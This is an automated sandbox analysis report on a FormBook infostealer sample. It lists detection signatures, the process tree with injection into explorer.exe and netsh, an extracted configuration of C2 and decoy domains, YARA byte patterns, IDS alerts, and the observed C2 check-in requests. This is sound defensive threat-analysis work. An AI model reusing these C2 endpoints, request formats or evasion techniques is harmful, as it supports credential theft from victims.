
Windows Analysis Report
8tvMmyxveyzFcnJ.exe

Overview

General Information

Sample name: 8tvMmyxveyzFcnJ.exe
Analysis ID: 1470721
MD5: fff69b0890fc5c9c754e17d06deb5216
SHA1: e3b4644bd7f114a830ec649edbed92a437a81673
SHA256: a8fe32e805d1e0a0a61e2763308b01be24656f9bd356a863b174ce61e32d9a7e
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 8tvMmyxveyzFcnJ.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe" MD5: FFF69B0890FC5C9C754E17D06DEB5216)
    • 8tvMmyxveyzFcnJ.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe" MD5: FFF69B0890FC5C9C754E17D06DEB5216)
    • 8tvMmyxveyzFcnJ.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe" MD5: FFF69B0890FC5C9C754E17D06DEB5216)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autofmt.exe (PID: 180 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)
        • netsh.exe (PID: 396 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 5676 cmdline: /c del "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.sainikshiksha.com/mc10/"], "decoy": ["sttcorp.one", "jack88.lat", "owl-protect.com", "hnszrrn.com", "at89v2.com", "h147.top", "takle4creators.com", "fondsa.xyz", "mantenopolice.com", "shophansler.com", "dessertt.com", "thecollisionmagazine.com", "tatesfluffyfrenchies.com", "h1f2v.rest", "bluewandltd.com", "cuplaho2003.shop", "2thetcleaningservice.com", "yc85w.top", "natursache.shop", "allmyabilities.com", "sorteioagora.shop", "291van.fun", "bforeplay.com", "playcoy99.com", "grapplegrid.app", "machaiproductions.com", "bjcysadz.xyz", "hg44a.com", "english4u.online", "w15hh.rest", "kurainu.xyz", "psycrowolgy.com", "quantron.xyz", "realtors.biz", "hjjhggh.top", "767jogo.com", "inspirationandhumor.com", "basedawgz.live", "jigofort.com", "bonjourmignon.com", "huttonsidel.online", "iffacosmetics.com", "483yes.com", "motolimod.com", "xatapartners.com", "laurelhw.com", "sztopsports.com", "ethermail-register.com", "ust-online.com", "theofficescowork.com", "arkonwheels.com", "projectorvibe.com", "xpanas.black", "gemaroke2.shop", "sofiastory.store", "dealerxai.com", "zerolength.xyz", "marketmaventesfayellc.site", "instrumentsurvey-dinarjatim.com", "ajansyapai.net", "llngx.com", "onwardgrowth.com", "useprize.com", "zaki-argan.com"]}
Source, Rule, Description, Author, Strings
Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Source, Rule, Description, Author, Strings
Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
  • 0x17a49:$sqlite3step: 68 34 1C 7B E1
  • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a78:$sqlite3text: 68 38 2A 90 C5
  • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          No Sigma rule has matched
Timestamp: 07/10/24-12:11:01.020125
SID: 2031412
Source Port: 50630
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/10/24-12:13:25.925017
SID: 2031412
Source Port: 50634
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/10/24-12:11:21.261447
SID: 2031412
Source Port: 50631
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/10/24-12:11:42.251746
SID: 2031412
Source Port: 50632
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/10/24-12:10:40.094311
SID: 2031412
Source Port: 49743
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/10/24-12:12:01.865030
SID: 2031412
Source Port: 50633
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


          AV Detection

Source: http://www.tatesfluffyfrenchies.com/mc10/, Avira URL Cloud: Label: phishing
Source: http://www.shophansler.com/mc10/:, Avira URL Cloud: Label: phishing
Source: http://www.tatesfluffyfrenchies.com/mc10/www.dealerxai.com, Avira URL Cloud: Label: phishing
Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.sainikshiksha.com/mc10/"], "decoy": ["sttcorp.one", "jack88.lat", "owl-protect.com", "hnszrrn.com", "at89v2.com", "h147.top", "takle4creators.com", "fondsa.xyz", "mantenopolice.com", "shophansler.com", "dessertt.com", "thecollisionmagazine.com", "tatesfluffyfrenchies.com", "h1f2v.rest", "bluewandltd.com", "cuplaho2003.shop", "2thetcleaningservice.com", "yc85w.top", "natursache.shop", "allmyabilities.com", "sorteioagora.shop", "291van.fun", "bforeplay.com", "playcoy99.com", "grapplegrid.app", "machaiproductions.com", "bjcysadz.xyz", "hg44a.com", "english4u.online", "w15hh.rest", "kurainu.xyz", "psycrowolgy.com", "quantron.xyz", "realtors.biz", "hjjhggh.top", "767jogo.com", "inspirationandhumor.com", "basedawgz.live", "jigofort.com", "bonjourmignon.com", "huttonsidel.online", "iffacosmetics.com", "483yes.com", "motolimod.com", "xatapartners.com", "laurelhw.com", "sztopsports.com", "ethermail-register.com", "ust-online.com", "theofficescowork.com", "arkonwheels.com", "projectorvibe.com", "xpanas.black", "gemaroke2.shop", "sofiastory.store", "dealerxai.com", "zerolength.xyz", "marketmaventesfayellc.site", "instrumentsurvey-dinarjatim.com", "ajansyapai.net", "llngx.com", "onwardgrowth.com", "useprize.com", "zaki-argan.com"]}
Source: 8tvMmyxveyzFcnJ.exe, ReversingLabs: Detection: 52%
Source: 8tvMmyxveyzFcnJ.exe, Virustotal: Detection: 49%
Source: Yara match, File source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: 8tvMmyxveyzFcnJ.exe, Joe Sandbox ML: detected
Source: 8tvMmyxveyzFcnJ.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8tvMmyxveyzFcnJ.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: netsh.pdb source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.0000000001330000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.0000000001330000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1756812796.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1754917189.00000000009B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 8tvMmyxveyzFcnJ.exe, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000006.00000003.1756812796.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1754917189.00000000009B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: AYIS.pdb source: 8tvMmyxveyzFcnJ.exe
          Source: Binary string: |.pDb source: 8tvMmyxveyzFcnJ.exe
          Source: Binary string: AYIS.pdbSHA256M source: 8tvMmyxveyzFcnJ.exe
Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe, Code function: 4x nop then pop edi, 3_2_00416CDF
Source: C:\Windows\SysWOW64\netsh.exe, Code function: 4x nop then pop edi, 6_2_00416CDF

          Networking

Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49743 -> 188.114.97.3:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50630 -> 3.64.163.50:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50631 -> 103.224.212.213:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50632 -> 103.191.209.34:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50633 -> 3.33.130.190:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:50634 -> 198.185.159.144:80
Source: Malware configuration extractor, URLs: www.sainikshiksha.com/mc10/
          Source: DNS query: www.fondsa.xyz
Source: global traffic, HTTP traffic detected: GET /mc10/?M6=0jqVw3fXhgUe9S01oU54GSyQct+tyOMGPM4Q+l1hxxFHWjnqq7dqR8wNeV12RES6q9dV&sZ=Ynzp6xUh HTTP/1.1 Host: www.291van.fun Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh HTTP/1.1 Host: www.motolimod.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh HTTP/1.1 Host: www.at89v2.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View, IP Address: 103.224.212.213
Source: Joe Sandbox View, IP Address: 188.114.97.3
Source: Joe Sandbox View, IP Address: 188.114.97.3
Source: Joe Sandbox View, ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: unknown, TCP traffic detected without corresponding DNS query: 3.64.163.50 (reported 11 times)
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 14 times)
Source: C:\Windows\explorer.exe, Code function: 4_2_0F88DF82 getaddrinfo,setsockopt,recv, 4_2_0F88DF82
Source: global traffic, DNS traffic detected: DNS query: www.basedawgz.live
Source: global traffic, DNS traffic detected: DNS query: www.thecollisionmagazine.com
Source: global traffic, DNS traffic detected: DNS query: www.291van.fun
Source: global traffic, DNS traffic detected: DNS query: www.motolimod.com
Source: global traffic, DNS traffic detected: DNS query: www.at89v2.com
Source: global traffic, DNS traffic detected: DNS query: www.sainikshiksha.com
Source: global traffic, DNS traffic detected: DNS query: www.fondsa.xyz
Source: global traffic, DNS traffic detected: DNS query: www.huttonsidel.online
Source: global traffic, DNS traffic detected: DNS query: www.llngx.com
Source: global traffic, DNS traffic detected: DNS query: www.ajansyapai.net
Source: global traffic, DNS traffic detected: DNS query: www.tatesfluffyfrenchies.com
Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3111563665.0000000009834000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3464304091.0000000009834000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3111563665.0000000009834000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3464304091.0000000009834000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3111563665.0000000009834000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3464304091.0000000009834000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3111563665.0000000009834000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3464304091.0000000009834000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000004.00000000.1706494215.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1704923328.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1704462653.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.291van.fun
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.291van.fun/mc10/
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.291van.fun/mc10/www.motolimod.com
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.291van.funReferer:
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.ajansyapai.net
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.ajansyapai.net/mc10/
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.ajansyapai.net/mc10/www.tatesfluffyfrenchies.com
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.ajansyapai.netReferer:
Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.at89v2.com
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.at89v2.com/mc10/
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.at89v2.com/mc10/www.sainikshiksha.com
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.at89v2.comReferer:
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.basedawgz.live
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.basedawgz.live/mc10/
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.basedawgz.live/mc10/www.thecollisionmagazine.com
Source: explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.basedawgz.liveReferer:
